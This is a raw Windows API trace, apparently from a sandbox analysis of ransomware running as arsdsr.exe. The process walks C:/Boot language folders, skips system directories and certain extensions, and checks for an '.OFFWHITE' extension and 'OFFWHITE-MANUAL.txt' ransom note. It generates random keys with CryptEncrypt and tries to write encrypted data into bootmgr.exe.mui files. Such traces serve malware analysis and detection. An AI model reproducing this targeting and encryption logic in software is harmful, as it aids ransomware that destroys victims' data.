lstrcmpiW (lpString1="hu-HU", lpString2="ntuser.dat") returned -1 [0082.273] lstrcmpiW (lpString1="hu-HU", lpString2="programdata") returned -1 [0082.273] lstrcmpiW (lpString1="hu-HU", lpString2="appdata") returned 1 [0082.273] lstrcmpiW (lpString1="hu-HU", lpString2="program files") returned -1 [0082.273] lstrcmpiW (lpString1="hu-HU", lpString2="program files (x86)") returned -1 [0082.273] lstrcpyW (in: lpString1=0x295f4e8, lpString2="C:/Boot\\" | out: lpString1="C:/Boot\\") returned="C:/Boot\\" [0082.273] lstrcatW (in: lpString1="C:/Boot\\", lpString2="hu-HU" | out: lpString1="C:/Boot\\hu-HU") returned="C:/Boot\\hu-HU" [0082.273] lstrcatW (in: lpString1="C:/Boot\\hu-HU", lpString2="\\" | out: lpString1="C:/Boot\\hu-HU\\") returned="C:/Boot\\hu-HU\\" [0082.273] lstrcpyW (in: lpString1=0x295f070, lpString2="C:/Boot\\hu-HU\\" | out: lpString1="C:/Boot\\hu-HU\\") returned="C:/Boot\\hu-HU\\" [0082.273] lstrcatW (in: lpString1="C:/Boot\\hu-HU\\", lpString2="*.*" | out: lpString1="C:/Boot\\hu-HU\\*.*") returned="C:/Boot\\hu-HU\\*.*" [0082.273] FindFirstFileW (in: lpFileName="C:/Boot\\hu-HU\\*.*", lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName=".", cAlternateFileName="")) returned 0x544690 [0082.274] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0082.274] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="..", cAlternateFileName="")) returned 1 [0082.274] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0082.274] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0082.274] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0082.274] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0082.274] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0082.274] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0082.274] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0082.274] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$recycle.bin") returned 1 [0082.274] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="rsa") returned -1 [0082.274] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0082.274] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="programdata") returned -1 [0082.274] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="appdata") returned 1 [0082.274] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="program files") returned -1 [0082.274] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="program files (x86)") returned -1 [0082.274] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Boot\\hu-HU\\" | out: lpString1="C:/Boot\\hu-HU\\") returned="C:/Boot\\hu-HU\\" [0082.274] lstrcatW (in: lpString1="C:/Boot\\hu-HU\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:/Boot\\hu-HU\\bootmgr.exe.mui") returned="C:/Boot\\hu-HU\\bootmgr.exe.mui" [0082.275] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.275] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.275] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0082.275] lstrcmpiW (lpString1=".mui", lpString2=".exe") returned 1 [0082.275] lstrcmpiW (lpString1=".mui", lpString2=".log") returned 1 [0082.275] lstrcmpiW (lpString1=".mui", lpString2=".cab") returned 1 [0082.275] lstrcmpiW (lpString1=".mui", lpString2=".cmd") returned 1 [0082.275] lstrcmpiW (lpString1=".mui", lpString2=".com") returned 1 [0082.275] lstrcmpiW (lpString1=".mui", lpString2=".cpl") returned 1 [0082.275] lstrcmpiW (lpString1=".mui", lpString2=".ini") returned 1 [0082.275] lstrcmpiW (lpString1=".mui", lpString2=".dll") returned 1 [0082.275] lstrcmpiW (lpString1=".mui", lpString2=".url") returned -1 [0082.275] lstrcmpiW (lpString1=".mui", lpString2=".ttf") returned -1 [0082.275] lstrcmpiW (lpString1=".mui", lpString2=".mp3") returned 1 [0082.275] lstrcmpiW (lpString1=".mui", lpString2=".pif") returned -1 [0082.275] lstrcmpiW (lpString1=".mui", lpString2=".mp4") returned 1 [0082.275] lstrcmpiW (lpString1=".mui", lpString2=".OFFWHITE") returned -1 [0082.275] lstrcmpiW (lpString1=".mui", lpString2=".msi") returned 1 [0082.275] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0082.275] GetProcessHeap () returned 0x500000 [0082.275] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52bc50 [0082.275] CreateFileW (lpFileName="C:/Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0082.276] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295ebe0 | out: lpFileSize=0x295ebe0*=-4251587516) returned 0 [0082.276] GetProcessHeap () returned 0x500000 [0082.276] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x52a870 [0082.276] GetProcessHeap () returned 0x500000 [0082.276] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x52a8e8 [0082.276] GetProcessHeap () returned 0x500000 [0082.276] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x520300 [0082.276] GetProcessHeap () returned 0x500000 [0082.276] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x520408 [0082.276] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.276] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.276] SystemFunction036 (in: RandomBuffer=0x52a870, RandomBufferLength=0x10 | out: RandomBuffer=0x52a870) returned 1 [0082.276] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.276] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.276] SystemFunction036 (in: RandomBuffer=0x52a8e8, RandomBufferLength=0x10 | out: RandomBuffer=0x52a8e8) returned 1 [0082.276] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.276] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.276] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x520300*, pdwDataLen=0x295e990*=0x10, dwBufLen=0x100 | out: pbData=0x520300*, pdwDataLen=0x295e990*=0x100) returned 1 [0082.276] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.276] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.276] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x520408*, pdwDataLen=0x295e98c*=0x10, dwBufLen=0x100 | out: pbData=0x520408*, pdwDataLen=0x295e98c*=0x100) returned 1 [0082.277] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295ec44, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0082.277] SetLastError (dwErrCode=0x0) [0082.277] WriteFile (in: hFile=0xffffffff, lpBuffer=0x520300, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0) returned 0 [0082.277] GetLastError () returned 0x6 [0082.277] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0082.277] FindClose (in: hFindFile=0x544690 | out: hFindFile=0x544690) returned 1 [0082.277] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe000c, dwReserved1=0x295fd70, cFileName="it-IT", cAlternateFileName="")) returned 1 [0082.277] lstrcmpiW (lpString1="it-IT", lpString2=".") returned 1 [0082.277] lstrcmpiW (lpString1="it-IT", lpString2="..") returned 1 [0082.277] lstrcmpiW (lpString1="it-IT", lpString2="...") returned 1 [0082.277] lstrcmpiW (lpString1="it-IT", lpString2="windows") returned -1 [0082.277] lstrcmpiW (lpString1="it-IT", lpString2="$recycle.bin") returned 1 [0082.277] lstrcmpiW (lpString1="it-IT", lpString2="rsa") returned -1 [0082.277] lstrcmpiW (lpString1="it-IT", lpString2="ntuser.dat") returned -1 [0082.277] lstrcmpiW (lpString1="it-IT", lpString2="programdata") returned -1 [0082.277] lstrcmpiW (lpString1="it-IT", lpString2="appdata") returned 1 [0082.277] lstrcmpiW (lpString1="it-IT", lpString2="program files") returned -1 [0082.277] lstrcmpiW (lpString1="it-IT", lpString2="program files (x86)") returned -1 [0082.277] lstrcpyW (in: lpString1=0x295f4e8, lpString2="C:/Boot\\" | out: lpString1="C:/Boot\\") returned="C:/Boot\\" [0082.278] lstrcatW (in: lpString1="C:/Boot\\", lpString2="it-IT" | out: lpString1="C:/Boot\\it-IT") returned="C:/Boot\\it-IT" [0082.278] lstrcatW (in: lpString1="C:/Boot\\it-IT", lpString2="\\" | out: lpString1="C:/Boot\\it-IT\\") returned="C:/Boot\\it-IT\\" [0082.278] lstrcpyW (in: lpString1=0x295f070, lpString2="C:/Boot\\it-IT\\" | out: lpString1="C:/Boot\\it-IT\\") returned="C:/Boot\\it-IT\\" [0082.278] lstrcatW (in: lpString1="C:/Boot\\it-IT\\", lpString2="*.*" | out: lpString1="C:/Boot\\it-IT\\*.*") returned="C:/Boot\\it-IT\\*.*" [0082.278] FindFirstFileW (in: lpFileName="C:/Boot\\it-IT\\*.*", lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName=".", cAlternateFileName="")) returned 0x544690 [0082.279] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0082.279] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="..", cAlternateFileName="")) returned 1 [0082.279] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0082.279] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0082.279] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0082.279] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0082.279] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0082.279] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0082.279] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0082.279] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$recycle.bin") returned 1 [0082.279] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="rsa") returned -1 [0082.279] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0082.279] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="programdata") returned -1 [0082.279] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="appdata") returned 1 [0082.279] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="program files") returned -1 [0082.279] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="program files (x86)") returned -1 [0082.279] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Boot\\it-IT\\" | out: lpString1="C:/Boot\\it-IT\\") returned="C:/Boot\\it-IT\\" [0082.279] lstrcatW (in: lpString1="C:/Boot\\it-IT\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:/Boot\\it-IT\\bootmgr.exe.mui") returned="C:/Boot\\it-IT\\bootmgr.exe.mui" [0082.279] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.279] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.279] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0082.280] lstrcmpiW (lpString1=".mui", lpString2=".exe") returned 1 [0082.280] lstrcmpiW (lpString1=".mui", lpString2=".log") returned 1 [0082.280] lstrcmpiW (lpString1=".mui", lpString2=".cab") returned 1 [0082.280] lstrcmpiW (lpString1=".mui", lpString2=".cmd") returned 1 [0082.280] lstrcmpiW (lpString1=".mui", lpString2=".com") returned 1 [0082.280] lstrcmpiW (lpString1=".mui", lpString2=".cpl") returned 1 [0082.280] lstrcmpiW (lpString1=".mui", lpString2=".ini") returned 1 [0082.280] lstrcmpiW (lpString1=".mui", lpString2=".dll") returned 1 [0082.280] lstrcmpiW (lpString1=".mui", lpString2=".url") returned -1 [0082.280] lstrcmpiW (lpString1=".mui", lpString2=".ttf") returned -1 [0082.280] lstrcmpiW (lpString1=".mui", lpString2=".mp3") returned 1 [0082.280] lstrcmpiW (lpString1=".mui", lpString2=".pif") returned -1 [0082.280] lstrcmpiW (lpString1=".mui", lpString2=".mp4") returned 1 [0082.280] lstrcmpiW (lpString1=".mui", lpString2=".OFFWHITE") returned -1 [0082.280] lstrcmpiW (lpString1=".mui", lpString2=".msi") returned 1 [0082.280] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0082.280] GetProcessHeap () returned 0x500000 [0082.280] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52bc70 [0082.280] CreateFileW (lpFileName="C:/Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0082.280] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295ebe0 | out: lpFileSize=0x295ebe0*=-4251587516) returned 0 [0082.280] GetProcessHeap () returned 0x500000 [0082.280] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x52a978 [0082.281] GetProcessHeap () returned 0x500000 [0082.281] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5485f8 [0082.281] GetProcessHeap () returned 0x500000 [0082.281] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x520510 [0082.281] GetProcessHeap () returned 0x500000 [0082.281] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x520618 [0082.281] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.281] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.281] SystemFunction036 (in: RandomBuffer=0x52a978, RandomBufferLength=0x10 | out: RandomBuffer=0x52a978) returned 1 [0082.281] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.281] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.281] SystemFunction036 (in: RandomBuffer=0x5485f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5485f8) returned 1 [0082.281] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.281] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.281] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x520510*, pdwDataLen=0x295e990*=0x10, dwBufLen=0x100 | out: pbData=0x520510*, pdwDataLen=0x295e990*=0x100) returned 1 [0082.281] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.281] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.281] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x520618*, pdwDataLen=0x295e98c*=0x10, dwBufLen=0x100 | out: pbData=0x520618*, pdwDataLen=0x295e98c*=0x100) returned 1 [0082.282] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295ec44, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0082.282] SetLastError (dwErrCode=0x0) [0082.282] WriteFile (in: hFile=0xffffffff, lpBuffer=0x520510, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0) returned 0 [0082.282] GetLastError () returned 0x6 [0082.282] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0082.282] FindClose (in: hFindFile=0x544690 | out: hFindFile=0x544690) returned 1 [0082.282] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe000c, dwReserved1=0x295fd70, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0082.282] lstrcmpiW (lpString1="ja-JP", lpString2=".") returned 1 [0082.282] lstrcmpiW (lpString1="ja-JP", lpString2="..") returned 1 [0082.282] lstrcmpiW (lpString1="ja-JP", lpString2="...") returned 1 [0082.282] lstrcmpiW (lpString1="ja-JP", lpString2="windows") returned -1 [0082.282] lstrcmpiW (lpString1="ja-JP", lpString2="$recycle.bin") returned 1 [0082.282] lstrcmpiW (lpString1="ja-JP", lpString2="rsa") returned -1 [0082.282] lstrcmpiW (lpString1="ja-JP", lpString2="ntuser.dat") returned -1 [0082.283] lstrcmpiW (lpString1="ja-JP", lpString2="programdata") returned -1 [0082.283] lstrcmpiW (lpString1="ja-JP", lpString2="appdata") returned 1 [0082.283] lstrcmpiW (lpString1="ja-JP", lpString2="program files") returned -1 [0082.283] lstrcmpiW (lpString1="ja-JP", lpString2="program files (x86)") returned -1 [0082.283] lstrcpyW (in: lpString1=0x295f4e8, lpString2="C:/Boot\\" | out: lpString1="C:/Boot\\") returned="C:/Boot\\" [0082.283] lstrcatW (in: lpString1="C:/Boot\\", lpString2="ja-JP" | out: lpString1="C:/Boot\\ja-JP") returned="C:/Boot\\ja-JP" [0082.283] lstrcatW (in: lpString1="C:/Boot\\ja-JP", lpString2="\\" | out: lpString1="C:/Boot\\ja-JP\\") returned="C:/Boot\\ja-JP\\" [0082.283] lstrcpyW (in: lpString1=0x295f070, lpString2="C:/Boot\\ja-JP\\" | out: lpString1="C:/Boot\\ja-JP\\") returned="C:/Boot\\ja-JP\\" [0082.283] lstrcatW (in: lpString1="C:/Boot\\ja-JP\\", lpString2="*.*" | out: lpString1="C:/Boot\\ja-JP\\*.*") returned="C:/Boot\\ja-JP\\*.*" [0082.283] FindFirstFileW (in: lpFileName="C:/Boot\\ja-JP\\*.*", lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName=".", cAlternateFileName="")) returned 0x544690 [0082.283] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0082.283] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="..", cAlternateFileName="")) returned 1 [0082.283] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0082.283] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0082.283] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0082.284] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0082.284] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0082.284] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0082.284] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0082.284] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$recycle.bin") returned 1 [0082.284] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="rsa") returned -1 [0082.284] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0082.284] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="programdata") returned -1 [0082.284] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="appdata") returned 1 [0082.284] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="program files") returned -1 [0082.284] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="program files (x86)") returned -1 [0082.284] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Boot\\ja-JP\\" | out: lpString1="C:/Boot\\ja-JP\\") returned="C:/Boot\\ja-JP\\" [0082.284] lstrcatW (in: lpString1="C:/Boot\\ja-JP\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:/Boot\\ja-JP\\bootmgr.exe.mui") returned="C:/Boot\\ja-JP\\bootmgr.exe.mui" [0082.284] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.284] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.284] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0082.284] lstrcmpiW (lpString1=".mui", lpString2=".exe") returned 1 [0082.284] lstrcmpiW (lpString1=".mui", lpString2=".log") returned 1 [0082.284] lstrcmpiW (lpString1=".mui", lpString2=".cab") returned 1 [0082.284] lstrcmpiW (lpString1=".mui", lpString2=".cmd") returned 1 [0082.284] lstrcmpiW (lpString1=".mui", lpString2=".com") returned 1 [0082.284] lstrcmpiW (lpString1=".mui", lpString2=".cpl") returned 1 [0082.284] lstrcmpiW (lpString1=".mui", lpString2=".ini") returned 1 [0082.284] lstrcmpiW (lpString1=".mui", lpString2=".dll") returned 1 [0082.284] lstrcmpiW (lpString1=".mui", lpString2=".url") returned -1 [0082.284] lstrcmpiW (lpString1=".mui", lpString2=".ttf") returned -1 [0082.285] lstrcmpiW (lpString1=".mui", lpString2=".mp3") returned 1 [0082.285] lstrcmpiW (lpString1=".mui", lpString2=".pif") returned -1 [0082.285] lstrcmpiW (lpString1=".mui", lpString2=".mp4") returned 1 [0082.285] lstrcmpiW (lpString1=".mui", lpString2=".OFFWHITE") returned -1 [0082.285] lstrcmpiW (lpString1=".mui", lpString2=".msi") returned 1 [0082.285] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0082.285] GetProcessHeap () returned 0x500000 [0082.285] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52bc80 [0082.285] CreateFileW (lpFileName="C:/Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff 